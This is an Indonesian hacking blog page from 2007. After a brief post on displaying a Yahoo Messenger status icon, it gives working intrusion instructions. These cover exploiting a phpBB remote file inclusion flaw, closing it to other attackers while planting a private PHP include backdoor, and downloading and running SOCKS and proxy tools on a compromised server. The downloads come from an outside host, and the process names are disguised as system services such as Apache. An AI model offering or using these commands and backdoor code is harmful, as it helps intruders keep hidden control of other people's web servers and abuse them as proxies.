mungkin ketika and membuka sebuah situs sering melihat icon seperti ini ![]()
yang menandakan kalo YM admin web tersebut sedang online…untuk membuat gambar seperti itu di web kita kopi pastekan script dibawah ini
Membuat Status Yahoo Messenger
September 29, 2007Patch Bug & bikin backdor
September 29, 2007kadang2 kita dapet bug sebuah web eh lagi enak2 kita explorasi ada yg patch
jadi dech gak isa masuk cape de…
berikut ini adalah cara patch sebuah bug web
untuk contoh saya akan gunakan salah satu bug pada phpbb
http://www.webbatur.com/phpBB2/language/lang_english/lang_main_album.php?phpbb_root_path=http://webijek?
dari contoh web diatas bug web terdapat pada file lang_main_album.php
variabel yg kena bug $phpbb_root_path
nah variabel $pbpbb_root_path ini lah yang akan kita blok sehingga orang lain
tidak bisa masuk ke web tsbt ok
pertama kita edit file lang_main_album.php tambahkan pada bagian atas isi file lang_main_album.php
script berikut ini :
if (eregi (“http://”, $phpbb_root_path)){echo “patched by th0nk hehehe”;exit;}
sekarang kita coba buka tuh web
maka yg muncul buka nya shell injekan kita tapi tulisan “patched by th0nk hehehe”
dah selese sampe sini aja…eh belum heheh lupa
kalo webnya dah di patch terus kita sendiri masuk nya lewat mana??…
tenang2 itu bisa kita atasin pas kita patch bug tersebut jangan lupa
kita buat juga backdor buat kita masuk kekekeke
tambahkan script dibawah ini di dabawah script patched tadi
if (isset ($_GET[th0nk])){include ($th0nk);exit;}
terus kita coba akses web tersebut menjadi
http://www.webbatur.com/phpBB2/language/lang_english/lang_main_album.php?th0nk=http://webijek?
dan jreng..jreng masuk lagi kita ke shell tersebut heheheh sedangkan yg lain gak bisa masuk
karena bug aslinya sudah kita tutup…
dah segitu aja selese dah…
buat sock
September 29, 2007berikut ini cara membuat sock
masuk ke shell mu
wget http://dodol.arvixe.com/alat/sock.tgz => wget source sock.tgz ke shellmu
tar -zxvf sock.tgz => ekstrak
ps x => liat proses yg aktif untuk menyembunyikan proses sock kita
./xh -s entropychat => misal kita sembunyikan proses di “entropychat”
./socks -d -p p7654 => run sock pada port 7654 (port bebas)
buka browser misal IE
setting Tools-Internet Options-Connection-LAN Setting
centang use a proxy for your LAN- Advanced
setting Socks Masukan nama situs /ip addrees dan portnya OK test aja!
Membuat proxy
September 29, 2007masuk ke shell mu dulu
wget http://dodol.arvixe.com/alat/proxy.tgz => wget source proxy.tgz ke shell mu
tar -zxvf proxy.tgz => ekstrak
cd pro => masuk direktori
ps x => liat proses yg aktif untuk menyembunyikan proses proxy kalo di shell ilegal ![]()
./xh -s “/usr/sbin/apache” => sembunyikan proses proxy di /usr/sbin/apache
./prox -a -d -p1818 => jalankan proxy di port 1818
untuk port bebas bearapa aja asal jangan bentrok sama port yg sudah di pake ok !
Ditulis oleh iwan
Ditulis oleh iwan
Ditulis oleh iwan 
